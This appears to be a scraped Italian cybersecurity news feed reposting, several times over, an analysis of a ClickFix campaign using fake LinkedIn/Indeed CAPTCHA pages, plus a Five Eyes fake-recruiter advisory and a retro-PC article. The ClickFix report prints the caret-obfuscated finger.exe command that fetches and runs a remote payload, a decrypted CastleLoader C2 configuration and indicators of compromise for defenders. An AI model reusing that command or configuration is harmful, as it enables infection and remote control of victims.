Il comando è ulteriormente offuscato con caratteri caret (^) per eludere il pattern matching dei prodotti di sicurezza. Una volta eseguito dall’utente — che preme ENTER credendo di completare la verifica CAPTCHA — il sistema scarica ed esegue il payload successivo tramite strumenti di sistema legittimi (Living-off-the-Land), rendendo il processo quasi invisibile agli EDR che non monitorano le connessioni finger.exe in uscita.Catena di staging: Python runtime portatili e curl hijacking
Il malware copiacurl.exedi sistema con un filename randomizzato a 18 cifre sotto%LocalAppData%, scarica runtime Python portatili da python.org e GitHub (IronPython) salvandoli con estensione .pdf, e li estrae tramitetar.exenativo. Il processo uccide e riavviaexplorer.exeper disorientare l’utente. I runtime Python rinominati eseguono poi codice inline che decomprime un blob Base64+zlib e lancia il payload in memoria — fileless execution pura, senza file eseguibili su disco.
- CPython embedded:
%LocalAppData%\python-3.15.0a1-embed-win32.pdf- IronPython:
%LocalAppData%\IronPython.3.4.2.pdf
CastleLoader: framework MaaS con cifratura ChaCha20
Il payload di quinto stadio è CastleLoader, un framework Malware-as-a-Service per deployment flessibile di malware downstream. I primi 64 byte del blob scaricato fungono da chiave RC4 per decriptare CastleLoader stesso. Esempio di configurazione decifrata:URL: hXXps://sedaliarealty[.]net/1ed3c2fc-f870-5522-a6bd-71c0a4d78ddd campaign_id: 028aaf61-fef2-525a-9a95-7cd10db2e166 mutex_name: DE6TZHGHlXfrbvmQdHxJIb035 chacha_key: 0x0DF4397FDB725731AE751503C0FEFDCDB5F2967286379F7D662C297D41F07A15 chacha_nonce: 0x17612E6D4D22AC64AB157E3C
Tutta la comunicazione C2 successiva è cifrata con ChaCha20. Il loader invia al server il profilo del sistema infetto (username, hostname, dominio, versione Windows, architettura, AV installati) e riceve task strutturati. Le capability configurabili includono: anti-VM tramite cpuid, screenshot desktop tramite GDI BitBlt, enumerazione AV via WMI (root\SecurityCenter2), elevazione privilegi con “runas”, watchdog che rilancia continuamente il processo figlio.Payload finale: RAT Python con C2 WebSocket
Il payload finale è un RAT scritto in Python (bytecode .pyc) con C2 via WebSocket cifrato attraverso WinHTTP APIs. Il traffico C2 inbound è ulteriormente offuscato tramite XOR. Le funzionalità principali includono shell interattiva con relay stdin/stdout verso il C2, esecuzione in-memory di payload aggiuntivi, persistenza tramite mutex e watchdog con rilancio automatico, e raccolta approfondita di informazioni di sistema. I file di staging sono in directory caratteristiche sotto%ProgramData%: Ccrreewwll, NewKevinNotAnother, NewestWorkiNaprav.Indicatori di compromissione (IoC)
# Domini phishing e C2 linkedall[.]org uslinked[.]org linked-on[.]com indeed-jobs[.]net kevinnotanother[.]com sedaliarealty[.]net catalyst-ltd[.]net # Hash SHA-256 cd4a51037bf58733c0cb24b273951dd3fcea45a2aaeb8b30a3c625e183c4c0c7 d56b810dfacaa1630bf562ccdefd46835349710d9516334e1a182619335ddea7 # Endpoint UUID-based C2 95126aeb-4120-56b1-8c9e-63fdf0c0b6f9 ebd417db-979c-51f8-aedf-88a2bf8aa6c3 6d6d2d17-d270-59c6-8b75-df011af08e58 # Directory staging C:\ProgramData\Ccrreewwll\ C:\ProgramData\NewKevinNotAnother\ C:\ProgramData\NewestWorkiNaprav\ # File Python bytecode (main|install|play).pycDue righe per i difensori
Il blocco delle connessioni in uscita su porta 79 (Finger) è una misura difensiva immediata con impatto operativo quasi nullo. Sono ad alta fedeltà per la detection: processi Python con argomenti-cinline contenenti base64/zlib, copia dicurl.exein directory utente con nomi randomizzati numerici, creazione delle directory specifiche sotto%ProgramData%, e connessioni WebSocket verso domini recentemente registrati. Gli ambienti che bloccano l’esecuzione di runtime Python non firmati e limitano l’accesso a%LocalAppData%per applicazioni non autorizzate risultano significativamente più resilienti a questo vettore.Fonte: LevelBlue SpiderLabs Blog — King Orande e Cris Tomboc, 4 giugno 2026
ClickFix Is Now Hiring: From Job Platform Impersonation to Python-Based RAT Delivery
The LevelBlue OpsIntel CTI team examined the latest version of the ClickFix campaign, which emerged in early May 2026.King Orande and Cris Tomboc (Trustwave Holdings, Inc.)
reshared this
The media in this post is not displayed to visitors. To view it, please log in.
ClickFix si mette in cerca di lavoro: falsi annunci LinkedIn e Indeed per distribuire CastleLoader e RAT Python
@Informatica (Italy e non Italy)
LevelBlue SpiderLabs analizza una nuova variante ClickFix (maggio 2026) che usa siti typosquattati imitanti LinkedIn e Indeed, il protocollo Finger e runtime Python portatili per distribuire
ClickFix si mette in cerca di lavoro: falsi annunci LinkedIn e Indeed per distribuire CastleLoader e RAT Python
Il team CTI di LevelBlue SpiderLabs ha pubblicato un’analisi approfondita di una nuova variante della campagna ClickFix, comparsa in maggio 2026, che utilizza siti typosquattati impersonanti LinkedIn e Indeed per distribuire un framework MaaS denominato CastleLoader e un Remote Access Trojan (RAT) scritto in Python. La catena d’attacco combina l’abuso del protocollo Finger, esecuzione fileless tramite runtime Python portatili, cifratura ChaCha20/RC4 e comunicazioni C2 via WebSocket.Vettore iniziale: falsi CAPTCHA su cloni di LinkedIn e Indeed
L’attacco inizia con URL di phishing su domini typosquattati che imitano LinkedIn e Indeed (linkedall[.]org, uslinked[.]org, linked-on[.]com, indeed-jobs[.]net). Le URL includono parametri Google Ads (gclid, gbraid, gad_campaignid), indicando distribuzione tramite ecosistemi di advertising. Un parametro custom&verification=robotè necessario affinché il server risponda con la catena ClickFix — probabilmente come misura anti-analisi.La pagina di atterraggio mostra un finto CAPTCHA Cloudflare Turnstile. JavaScript embedded recupera il contenuto di secondo stadio da un endpoint PHP, applica ROT13 per decodificare la risposta, e inietta l’output nel DOM a runtime. Quando l’utente interagisce con il box CAPTCHA, un payload viene copiato nella clipboard tramite
document.execCommand("copy").Stage 3: il protocollo Finger come vettore LOLBin
L’elemento tecnico più rilevante di questa variante è l’abuso del protocollo Finger (porta 79) — un protocollo legacy degli anni ’70 che molti ambienti Windows mantengono abilitato per retrocompatibilità. Il comando copiato nella clipboard utilizzafinger.exe, nativo di Windows, per recuperare il payload:%COMSPEC% /c s^t^a^r^t "" /min for /f "skip=25 delims=" %e in ('f^^i^^n^^g^^e^^r wCeFgncRwB@f^^i^^n^^g^^e^^r^^.^^uslinked[.]org') do %e
Il comando è ulteriormente offuscato con caratteri caret (^) per eludere il pattern matching dei prodotti di sicurezza. Una volta eseguito dall’utente — che preme ENTER credendo di completare la verifica CAPTCHA — il sistema scarica ed esegue il payload successivo tramite strumenti di sistema legittimi (Living-off-the-Land), rendendo il processo quasi invisibile agli EDR che non monitorano le connessioni finger.exe in uscita.Catena di staging: Python runtime portatili e curl hijacking
Il malware copiacurl.exedi sistema con un filename randomizzato a 18 cifre sotto%LocalAppData%, scarica runtime Python portatili da python.org e GitHub (IronPython) salvandoli con estensione .pdf, e li estrae tramitetar.exenativo. Il processo uccide e riavviaexplorer.exeper disorientare l’utente. I runtime Python rinominati eseguono poi codice inline che decomprime un blob Base64+zlib e lancia il payload in memoria — fileless execution pura, senza file eseguibili su disco.
- CPython embedded:
%LocalAppData%\python-3.15.0a1-embed-win32.pdf- IronPython:
%LocalAppData%\IronPython.3.4.2.pdf
CastleLoader: framework MaaS con cifratura ChaCha20
Il payload di quinto stadio è CastleLoader, un framework Malware-as-a-Service per deployment flessibile di malware downstream. I primi 64 byte del blob scaricato fungono da chiave RC4 per decriptare CastleLoader stesso. Esempio di configurazione decifrata:URL: hXXps://sedaliarealty[.]net/1ed3c2fc-f870-5522-a6bd-71c0a4d78ddd campaign_id: 028aaf61-fef2-525a-9a95-7cd10db2e166 mutex_name: DE6TZHGHlXfrbvmQdHxJIb035 chacha_key: 0x0DF4397FDB725731AE751503C0FEFDCDB5F2967286379F7D662C297D41F07A15 chacha_nonce: 0x17612E6D4D22AC64AB157E3C
Tutta la comunicazione C2 successiva è cifrata con ChaCha20. Il loader invia al server il profilo del sistema infetto (username, hostname, dominio, versione Windows, architettura, AV installati) e riceve task strutturati. Le capability configurabili includono: anti-VM tramite cpuid, screenshot desktop tramite GDI BitBlt, enumerazione AV via WMI (root\SecurityCenter2), elevazione privilegi con “runas”, watchdog che rilancia continuamente il processo figlio.Payload finale: RAT Python con C2 WebSocket
Il payload finale è un RAT scritto in Python (bytecode .pyc) con C2 via WebSocket cifrato attraverso WinHTTP APIs. Il traffico C2 inbound è ulteriormente offuscato tramite XOR. Le funzionalità principali includono shell interattiva con relay stdin/stdout verso il C2, esecuzione in-memory di payload aggiuntivi, persistenza tramite mutex e watchdog con rilancio automatico, e raccolta approfondita di informazioni di sistema. I file di staging sono in directory caratteristiche sotto%ProgramData%: Ccrreewwll, NewKevinNotAnother, NewestWorkiNaprav.Indicatori di compromissione (IoC)
# Domini phishing e C2 linkedall[.]org uslinked[.]org linked-on[.]com indeed-jobs[.]net kevinnotanother[.]com sedaliarealty[.]net catalyst-ltd[.]net # Hash SHA-256 cd4a51037bf58733c0cb24b273951dd3fcea45a2aaeb8b30a3c625e183c4c0c7 d56b810dfacaa1630bf562ccdefd46835349710d9516334e1a182619335ddea7 # Endpoint UUID-based C2 95126aeb-4120-56b1-8c9e-63fdf0c0b6f9 ebd417db-979c-51f8-aedf-88a2bf8aa6c3 6d6d2d17-d270-59c6-8b75-df011af08e58 # Directory staging C:\ProgramData\Ccrreewwll\ C:\ProgramData\NewKevinNotAnother\ C:\ProgramData\NewestWorkiNaprav\ # File Python bytecode (main|install|play).pycDue righe per i difensori
Il blocco delle connessioni in uscita su porta 79 (Finger) è una misura difensiva immediata con impatto operativo quasi nullo. Sono ad alta fedeltà per la detection: processi Python con argomenti-cinline contenenti base64/zlib, copia dicurl.exein directory utente con nomi randomizzati numerici, creazione delle directory specifiche sotto%ProgramData%, e connessioni WebSocket verso domini recentemente registrati. Gli ambienti che bloccano l’esecuzione di runtime Python non firmati e limitano l’accesso a%LocalAppData%per applicazioni non autorizzate risultano significativamente più resilienti a questo vettore.Fonte: LevelBlue SpiderLabs Blog — King Orande e Cris Tomboc, 4 giugno 2026
ClickFix Is Now Hiring: From Job Platform Impersonation to Python-Based RAT Delivery
The LevelBlue OpsIntel CTI team examined the latest version of the ClickFix campaign, which emerged in early May 2026.King Orande and Cris Tomboc (Trustwave Holdings, Inc.)
The media in this post is not displayed to visitors. To view it, please log in.
Spie cinesi su LinkedIn: il Five Eyes documenta le campagne di recruiters falsi dell’intelligence militare di Pechino
@Informatica (Italy e non Italy)
FBI, MI5, ASIO, CSIS e NZSIS emettono un alert congiunto: ufficiali dell'intelligence militare cinese si fingono recruiter su LinkedIn, Indeed e Upwork per sottrarre informazioni
Spie cinesi su LinkedIn: il Five Eyes documenta le campagne di recruiters falsi dell’intelligence militare di Pechino
Le agenzie di intelligence dei cinque paesi alleati — FBI (USA), MI5 (UK), ASIO (Australia), CSIS (Canada) e NZSIS (Nuova Zelanda) — hanno emesso un alert congiunto che documenta come ufficiali dell’intelligence militare cinese si fingano recruiter professionisti su LinkedIn, Indeed e Upwork per sottrarre informazioni classificate a personale governativo, militare e della difesa. La minaccia non è nuova, ma la scala e la sofisticazione raggiunte nel 2026 rendono questo advisory un documento imprescindibile per chi opera nella sicurezza nazionale e nella protezione delle informazioni.Il modus operandi: dal curriculum all’intelligence
Il pattern operativo identificato dal Five Eyes è elegante nella sua semplicità. Gli ufficiali dell’intelligence cinese — appartenenti ai Military Intelligence Services di Pechino — creano profili verosimili su piattaforme di recruiting professionale, impersonando think tank, società di consulenza private e agenzie HR specializzate in analisi geopolitica e difesa.I profili di lavoro pubblicati riguardano tipicamente posizioni come “analista di politica estera”, “esperto di difesa per la regione Indo-Pacifica” o “ricercatore senior di relazioni bilaterali”. Il target non è casuale: i candidati vengono classificati in base al potenziale accesso a informazioni sensibili, attraverso l’analisi dei curriculum ricevuti. Chi detiene security clearance, lavora in agenzie governative o ha contatti con strutture militari sale automaticamente in cima alla lista degli obiettivi. L’advisory specifica che le piattaforme utilizzate includono LinkedIn, Indeed e Upwork, e che i candidati vengono anche contattati direttamente in base alla rilevanza dei loro profili pubblici.
La trappola del “trial report”
Una volta identificato il candidato di interesse, il processo si articola in fasi successive che servono a costruire fiducia e normalizzare richieste di informazioni progressivamente più sensibili. I selezionatori organizzano colloqui virtuali durante i quali nascondono la propria identità reale, sondando le conoscenze dell’interlocutore e il suo accesso a personale e risorse governative.Il punto critico è il cosiddetto “trial report”: ai candidati viene chiesto di scrivere un saggio di prova su temi come le relazioni bilaterali della Cina, la situazione nell’Indo-Pacifico o questioni di commercio internazionale e difesa. Accettato il primo elaborato, le richieste successive si fanno progressivamente più intrusive: ai candidati viene comunicato che i report “devono includere informazioni più privilegiate” per ricevere compensi più elevati.
A questo punto la comunicazione viene spostata su piattaforme di messaggistica cifrata. I compensi variano da qualche centinaio a diverse migliaia di dollari per report, pagati attraverso canali difficilmente tracciabili: PayPal, Payoneer, Zelle, Skrill, Wise, Western Union, e-transfer e criptovalute. I pagamenti vengono spesso effettuati da account di terze parti estranee al processo di recruiting — una classica tecnica di compartimentazione operativa che complica la tracciabilità e la raccolta di prove.
Il valore strategico dell’informazione non classificata
Uno degli aspetti più significativi dell’advisory è l’enfasi sul valore dell’informazione non classificata. Il Five Eyes avverte esplicitamente che “anche le informazioni non classificate fornite dai candidati vengono probabilmente raccolte e combinate con dati più sensibili”. Questa prospettiva sfida il tradizionale approccio alla sicurezza delle informazioni, che tende a concentrarsi esclusivamente sulla protezione dei materiali classificati.Steve Povolny di Exabeam ha commentato l’alert sottolineando come queste piattaforme stiano diventando veri e propri “ambienti di raccolta intelligence” che consentono a operatori stranieri di reclutare individui senza mai alzarsi dalla scrivania: “La minaccia insider non è più confinata ai dipendenti che rubano intenzionalmente segreti. Gli avversari prendono di mira l’intero ecosistema che circonda le informazioni sensibili — appaltatori, ex funzionari governativi, accademici, ricercatori, giornalisti ed esperti di settore che possono possedere solo frammenti di conoscenza preziosa, ma che una volta aggregati diventano intelligence operativa di valore strategico.”
Contesto storico: una tecnica scalabile e difficile da contrastare
L’uso di false opportunità lavorative come vettore di spionaggio è documentato da anni in diversi threat actor state-sponsored. Il FBI ha già messo in guardia contro operazioni analoghe attribuite alla Corea del Nord — celebri le campagne del Lazarus Group contro sviluppatori blockchain tramite finti colloqui tecnici — e all’Iran con Charming Kitten contro ricercatori nucleari e funzionari governativi. La specificità di questo advisory è l’attribuzione esplicita ai Military Intelligence Services cinesi e la documentazione di come le piattaforme di recruiting professionale siano diventate infrastrutture di raccolta intelligence sistematiche.L’alert del 3 giugno 2026 — disponibile come PDF sul portale IC3 dell’FBI — è uno dei rari momenti in cui i cinque paesi del network di intelligence condividono pubblicamente dettagli operativi su campagne attive. La scelta di rendere pubblico l’advisory suggerisce che la portata e il ritmo di queste attività abbiano raggiunto una soglia tale da giustificare un’operazione di sensibilizzazione coordinata a livello internazionale.
Raccomandazioni operative per le organizzazioni
Il Five Eyes individua come segnali d’allarme primari gli approcci non sollecitati da recruiter per posizioni che richiedono analisi di tematiche geopolitiche sensibili, le richieste di spostare le comunicazioni su app di messaggistica cifrata, le richieste di produrre report che includano informazioni “privilegiate” o “interne”, e i pagamenti attraverso piattaforme terze o criptovalute da parti non direttamente coinvolte nel recruiting.Per i responsabili della sicurezza organizzativa, l’advisory suggerisce di implementare programmi di sensibilizzazione specifici per i dipendenti con accesso a informazioni sensibili, con enfasi sul rischio rappresentato dalle piattaforme di networking professionale. La verifica dell’identità dei recruiter, la segnalazione degli approcci sospetti alle funzioni di sicurezza interne e il rispetto rigoroso delle politiche sull’uso dei social media professionali sono le contromisure fondamentali indicate.
Fonti: Five Eyes Joint Advisory — IC3/FBI, 3 giugno 2026 | SecurityWeek
Five Eyes: Chinese Spies Target Government, Military Staff With Fake Job Opportunities
Posing as recruiters on online platforms, Chinese intelligence officers target personnel with access to classified or privileged information.Ionut Arghire (SecurityWeek)
Using Windows 11 on an LGA 775 PC with AGP Videocard
The media in this post is not displayed to visitors. To view it, please log in.
Although the thought of installing a modern operating system like Windows 11 on something as archaic as a Core 2 Quad Q6600 Intel CPU may seem ridiculous, it being the flagship CPU of the time means that it still chews up low-end Celeron systems that are on the supported hardware list like the N4020. Hence [Omores] commencing on this latest adventure, with the snag being that the chosen mainboard features an AGP bus that Windows 11 no longer supports.
This system is intended to multi-boot a range of Windows OSes starting with Windows 98, while also playing nice with DOS and even Windows 11. In addition to the quad-core, 2.4 GHz Q6600 there’s also an amazing 3 GB of DDR1 RAM in the system.
The mainboard is the 2003-era Asrock 865PE, with the GPU being the highest-end GPU that still came in AGP flavor: the Radeon HD 4650 from 2009. Since the sole reason that Windows 11 doesn’t support AGP any more is due to the supporting files not being included with Windows 11, hence you can track it down on a Windows 10 1507 release install – such as the Intel AGP440.sys driver here – and install them with some file editing.
Since Windows 11 still supports the WDDM driver model from Windows Vista and 7 you can then install the Catalyst drivers from 2012 and be up and running. You only get 1 GB of VRAM for this card, but you probably don’t need much more on this level of hardware.
One major stumbling block remains, however, as Windows 11 24H2 enforces SSE4.2 instructions which the CPU doesn’t support. Ergo 23H2 is the newest Windows 11 version that can run on this system, with only the Education and Enterprise still receiving security updates, making it a bit of a pyrrhic victory, especially as Windows 7 benchmarks a fair bit faster on the same hardware.
youtube.com/embed/vs4bqCEnvUA?…
ClickFix si mette in cerca di lavoro: falsi annunci LinkedIn e Indeed per distribuire CastleLoader e RAT Python
The media in this post is not displayed to visitors. To view it, please go to the original post.
Il team CTI di LevelBlue SpiderLabs ha pubblicato un’analisi approfondita di una nuova variante della campagna ClickFix, comparsa in maggio 2026, che utilizza siti typosquattati impersonanti LinkedIn e Indeed per distribuire un framework MaaS denominato CastleLoader e un Remote Access Trojan (RAT) scritto in Python. La catena d’attacco combina l’abuso del protocollo Finger, esecuzione fileless tramite runtime Python portatili, cifratura ChaCha20/RC4 e comunicazioni C2 via WebSocket.
Vettore iniziale: falsi CAPTCHA su cloni di LinkedIn e Indeed
L’attacco inizia con URL di phishing su domini typosquattati che imitano LinkedIn e Indeed (linkedall[.]org, uslinked[.]org, linked-on[.]com, indeed-jobs[.]net). Le URL includono parametri Google Ads (gclid, gbraid, gad_campaignid), indicando distribuzione tramite ecosistemi di advertising. Un parametro custom &verification=robot è necessario affinché il server risponda con la catena ClickFix — probabilmente come misura anti-analisi.
La pagina di atterraggio mostra un finto CAPTCHA Cloudflare Turnstile. JavaScript embedded recupera il contenuto di secondo stadio da un endpoint PHP, applica ROT13 per decodificare la risposta, e inietta l’output nel DOM a runtime. Quando l’utente interagisce con il box CAPTCHA, un payload viene copiato nella clipboard tramite document.execCommand("copy").
Stage 3: il protocollo Finger come vettore LOLBin
L’elemento tecnico più rilevante di questa variante è l’abuso del protocollo Finger (porta 79) — un protocollo legacy degli anni ’70 che molti ambienti Windows mantengono abilitato per retrocompatibilità. Il comando copiato nella clipboard utilizza finger.exe, nativo di Windows, per recuperare il payload:
%COMSPEC% /c s^t^a^r^t "" /min for /f "skip=25 delims=" %e in ('f^^i^^n^^g^^e^^r wCeFgncRwB@f^^i^^n^^g^^e^^r^^.^^uslinked[.]org') do %eIl comando è ulteriormente offuscato con caratteri caret (^) per eludere il pattern matching dei prodotti di sicurezza. Una volta eseguito dall’utente — che preme ENTER credendo di completare la verifica CAPTCHA — il sistema scarica ed esegue il payload successivo tramite strumenti di sistema legittimi (Living-off-the-Land), rendendo il processo quasi invisibile agli EDR che non monitorano le connessioni finger.exe in uscita.
Catena di staging: Python runtime portatili e curl hijacking
Il malware copia curl.exe di sistema con un filename randomizzato a 18 cifre sotto %LocalAppData%, scarica runtime Python portatili da python.org e GitHub (IronPython) salvandoli con estensione .pdf, e li estrae tramite tar.exe nativo. Il processo uccide e riavvia explorer.exe per disorientare l’utente. I runtime Python rinominati eseguono poi codice inline che decomprime un blob Base64+zlib e lancia il payload in memoria — fileless execution pura, senza file eseguibili su disco.
- CPython embedded:
%LocalAppData%\python-3.15.0a1-embed-win32.pdf - IronPython:
%LocalAppData%\IronPython.3.4.2.pdf
CastleLoader: framework MaaS con cifratura ChaCha20
Il payload di quinto stadio è CastleLoader, un framework Malware-as-a-Service per deployment flessibile di malware downstream. I primi 64 byte del blob scaricato fungono da chiave RC4 per decriptare CastleLoader stesso. Esempio di configurazione decifrata:
URL: hXXps://sedaliarealty[.]net/1ed3c2fc-f870-5522-a6bd-71c0a4d78ddd
campaign_id: 028aaf61-fef2-525a-9a95-7cd10db2e166
mutex_name: DE6TZHGHlXfrbvmQdHxJIb035
chacha_key: 0x0DF4397FDB725731AE751503C0FEFDCDB5F2967286379F7D662C297D41F07A15
chacha_nonce: 0x17612E6D4D22AC64AB157E3CTutta la comunicazione C2 successiva è cifrata con ChaCha20. Il loader invia al server il profilo del sistema infetto (username, hostname, dominio, versione Windows, architettura, AV installati) e riceve task strutturati. Le capability configurabili includono: anti-VM tramite cpuid, screenshot desktop tramite GDI BitBlt, enumerazione AV via WMI (
root\SecurityCenter2), elevazione privilegi con “runas”, watchdog che rilancia continuamente il processo figlio.Payload finale: RAT Python con C2 WebSocket
Il payload finale è un RAT scritto in Python (bytecode .pyc) con C2 via WebSocket cifrato attraverso WinHTTP APIs. Il traffico C2 inbound è ulteriormente offuscato tramite XOR. Le funzionalità principali includono shell interattiva con relay stdin/stdout verso il C2, esecuzione in-memory di payload aggiuntivi, persistenza tramite mutex e watchdog con rilancio automatico, e raccolta approfondita di informazioni di sistema. I file di staging sono in directory caratteristiche sotto %ProgramData%: Ccrreewwll, NewKevinNotAnother, NewestWorkiNaprav.
Indicatori di compromissione (IoC)
# Domini phishing e C2
linkedall[.]org
uslinked[.]org
linked-on[.]com
indeed-jobs[.]net
kevinnotanother[.]com
sedaliarealty[.]net
catalyst-ltd[.]net
# Hash SHA-256
cd4a51037bf58733c0cb24b273951dd3fcea45a2aaeb8b30a3c625e183c4c0c7
d56b810dfacaa1630bf562ccdefd46835349710d9516334e1a182619335ddea7
# Endpoint UUID-based C2
95126aeb-4120-56b1-8c9e-63fdf0c0b6f9
ebd417db-979c-51f8-aedf-88a2bf8aa6c3
6d6d2d17-d270-59c6-8b75-df011af08e58
# Directory staging
C:\ProgramData\Ccrreewwll\
C:\ProgramData\NewKevinNotAnother\
C:\ProgramData\NewestWorkiNaprav\
# File Python bytecode
(main|install|play).pycDue righe per i difensori
Il blocco delle connessioni in uscita su porta 79 (Finger) è una misura difensiva immediata con impatto operativo quasi nullo. Sono ad alta fedeltà per la detection: processi Python con argomenti -c inline contenenti base64/zlib, copia di curl.exe in directory utente con nomi randomizzati numerici, creazione delle directory specifiche sotto %ProgramData%, e connessioni WebSocket verso domini recentemente registrati. Gli ambienti che bloccano l’esecuzione di runtime Python non firmati e limitano l’accesso a %LocalAppData% per applicazioni non autorizzate risultano significativamente più resilienti a questo vettore.
Fonte: LevelBlue SpiderLabs Blog — King Orande e Cris Tomboc, 4 giugno 2026
ClickFix Is Now Hiring: From Job Platform Impersonation to Python-Based RAT Delivery
The LevelBlue OpsIntel CTI team examined the latest version of the ClickFix campaign, which emerged in early May 2026.King Orande and Cris Tomboc (Trustwave Holdings, Inc.)
reshared this
Spie cinesi su LinkedIn: il Five Eyes documenta le campagne di recruiters falsi dell’intelligence militare di Pechino
The media in this post is not displayed to visitors. To view it, please go to the original post.
Le agenzie di intelligence dei cinque paesi alleati — FBI (USA), MI5 (UK), ASIO (Australia), CSIS (Canada) e NZSIS (Nuova Zelanda) — hanno emesso un alert congiunto che documenta come ufficiali dell’intelligence militare cinese si fingano recruiter professionisti su LinkedIn, Indeed e Upwork per sottrarre informazioni classificate a personale governativo, militare e della difesa. La minaccia non è nuova, ma la scala e la sofisticazione raggiunte nel 2026 rendono questo advisory un documento imprescindibile per chi opera nella sicurezza nazionale e nella protezione delle informazioni.
Il modus operandi: dal curriculum all’intelligence
Il pattern operativo identificato dal Five Eyes è elegante nella sua semplicità. Gli ufficiali dell’intelligence cinese — appartenenti ai Military Intelligence Services di Pechino — creano profili verosimili su piattaforme di recruiting professionale, impersonando think tank, società di consulenza private e agenzie HR specializzate in analisi geopolitica e difesa.
I profili di lavoro pubblicati riguardano tipicamente posizioni come “analista di politica estera”, “esperto di difesa per la regione Indo-Pacifica” o “ricercatore senior di relazioni bilaterali”. Il target non è casuale: i candidati vengono classificati in base al potenziale accesso a informazioni sensibili, attraverso l’analisi dei curriculum ricevuti. Chi detiene security clearance, lavora in agenzie governative o ha contatti con strutture militari sale automaticamente in cima alla lista degli obiettivi. L’advisory specifica che le piattaforme utilizzate includono LinkedIn, Indeed e Upwork, e che i candidati vengono anche contattati direttamente in base alla rilevanza dei loro profili pubblici.
La trappola del “trial report”
Una volta identificato il candidato di interesse, il processo si articola in fasi successive che servono a costruire fiducia e normalizzare richieste di informazioni progressivamente più sensibili. I selezionatori organizzano colloqui virtuali durante i quali nascondono la propria identità reale, sondando le conoscenze dell’interlocutore e il suo accesso a personale e risorse governative.
Il punto critico è il cosiddetto “trial report”: ai candidati viene chiesto di scrivere un saggio di prova su temi come le relazioni bilaterali della Cina, la situazione nell’Indo-Pacifico o questioni di commercio internazionale e difesa. Accettato il primo elaborato, le richieste successive si fanno progressivamente più intrusive: ai candidati viene comunicato che i report “devono includere informazioni più privilegiate” per ricevere compensi più elevati.
A questo punto la comunicazione viene spostata su piattaforme di messaggistica cifrata. I compensi variano da qualche centinaio a diverse migliaia di dollari per report, pagati attraverso canali difficilmente tracciabili: PayPal, Payoneer, Zelle, Skrill, Wise, Western Union, e-transfer e criptovalute. I pagamenti vengono spesso effettuati da account di terze parti estranee al processo di recruiting — una classica tecnica di compartimentazione operativa che complica la tracciabilità e la raccolta di prove.
Il valore strategico dell’informazione non classificata
Uno degli aspetti più significativi dell’advisory è l’enfasi sul valore dell’informazione non classificata. Il Five Eyes avverte esplicitamente che “anche le informazioni non classificate fornite dai candidati vengono probabilmente raccolte e combinate con dati più sensibili”. Questa prospettiva sfida il tradizionale approccio alla sicurezza delle informazioni, che tende a concentrarsi esclusivamente sulla protezione dei materiali classificati.
Steve Povolny di Exabeam ha commentato l’alert sottolineando come queste piattaforme stiano diventando veri e propri “ambienti di raccolta intelligence” che consentono a operatori stranieri di reclutare individui senza mai alzarsi dalla scrivania: “La minaccia insider non è più confinata ai dipendenti che rubano intenzionalmente segreti. Gli avversari prendono di mira l’intero ecosistema che circonda le informazioni sensibili — appaltatori, ex funzionari governativi, accademici, ricercatori, giornalisti ed esperti di settore che possono possedere solo frammenti di conoscenza preziosa, ma che una volta aggregati diventano intelligence operativa di valore strategico.”
Contesto storico: una tecnica scalabile e difficile da contrastare
L’uso di false opportunità lavorative come vettore di spionaggio è documentato da anni in diversi threat actor state-sponsored. Il FBI ha già messo in guardia contro operazioni analoghe attribuite alla Corea del Nord — celebri le campagne del Lazarus Group contro sviluppatori blockchain tramite finti colloqui tecnici — e all’Iran con Charming Kitten contro ricercatori nucleari e funzionari governativi. La specificità di questo advisory è l’attribuzione esplicita ai Military Intelligence Services cinesi e la documentazione di come le piattaforme di recruiting professionale siano diventate infrastrutture di raccolta intelligence sistematiche.
L’alert del 3 giugno 2026 — disponibile come PDF sul portale IC3 dell’FBI — è uno dei rari momenti in cui i cinque paesi del network di intelligence condividono pubblicamente dettagli operativi su campagne attive. La scelta di rendere pubblico l’advisory suggerisce che la portata e il ritmo di queste attività abbiano raggiunto una soglia tale da giustificare un’operazione di sensibilizzazione coordinata a livello internazionale.
Raccomandazioni operative per le organizzazioni
Il Five Eyes individua come segnali d’allarme primari gli approcci non sollecitati da recruiter per posizioni che richiedono analisi di tematiche geopolitiche sensibili, le richieste di spostare le comunicazioni su app di messaggistica cifrata, le richieste di produrre report che includano informazioni “privilegiate” o “interne”, e i pagamenti attraverso piattaforme terze o criptovalute da parti non direttamente coinvolte nel recruiting.
Per i responsabili della sicurezza organizzativa, l’advisory suggerisce di implementare programmi di sensibilizzazione specifici per i dipendenti con accesso a informazioni sensibili, con enfasi sul rischio rappresentato dalle piattaforme di networking professionale. La verifica dell’identità dei recruiter, la segnalazione degli approcci sospetti alle funzioni di sicurezza interne e il rispetto rigoroso delle politiche sull’uso dei social media professionali sono le contromisure fondamentali indicate.
Fonti: Five Eyes Joint Advisory — IC3/FBI, 3 giugno 2026 | SecurityWeek
Five Eyes: Chinese Spies Target Government, Military Staff With Fake Job Opportunities
Posing as recruiters on online platforms, Chinese intelligence officers target personnel with access to classified or privileged information.Ionut Arghire (SecurityWeek)
reshared this
Silent Ransom Group (SRG): Switching To DNS Fast Flux Infrastructure
securityaffairs.com/193215/cyb…
#securityaffairs #hacking
securityaffairs.com/193215/cyb…
#securityaffairs #hacking
Silent Ransom Group (SRG): Switching To DNS Fast Flux Infrastructure - Security Affairs
Researchers exposed the Silent Ransom Group 's Fast Flux infrastructure as the FBI warns of ongoing attacks targeting U.S. law firms and businesses.Pierluigi Paganini (Security Affairs)
Cybersecurity & cyberwarfare reshared this.
Ken Milmore
in reply to steve mookie kong • • •SeaFury 🦜🍃
in reply to steve mookie kong • • •steve mookie kong
in reply to SeaFury 🦜🍃 • • •Tiota Sram
in reply to steve mookie kong • • •Doug 🌈🇨🇦
in reply to steve mookie kong • • •Miles Offit... 🇨🇦🇪🇺🇺🇦
in reply to steve mookie kong • • •steve mookie kong
in reply to Miles Offit... 🇨🇦🇪🇺🇺🇦 • • •Carlo Zottmann
in reply to steve mookie kong • • •@mookie
𝐿𝒶𝓃𝒶 "not yet begun to fight"
in reply to steve mookie kong • • •steve mookie kong
in reply to 𝐿𝒶𝓃𝒶 "not yet begun to fight" • • •bhaugland
in reply to steve mookie kong • • •steve mookie kong
in reply to bhaugland • • •Sean Kleefeld
in reply to steve mookie kong • • •youtube.com/watch?v=WO5wpeYSot…
watch
www.youtube.comsteve mookie kong
in reply to Sean Kleefeld • • •Rue Mohr
in reply to steve mookie kong • • •steve mookie kong
in reply to Rue Mohr • • •Charles J Gervasi ⚡🛡️🥥
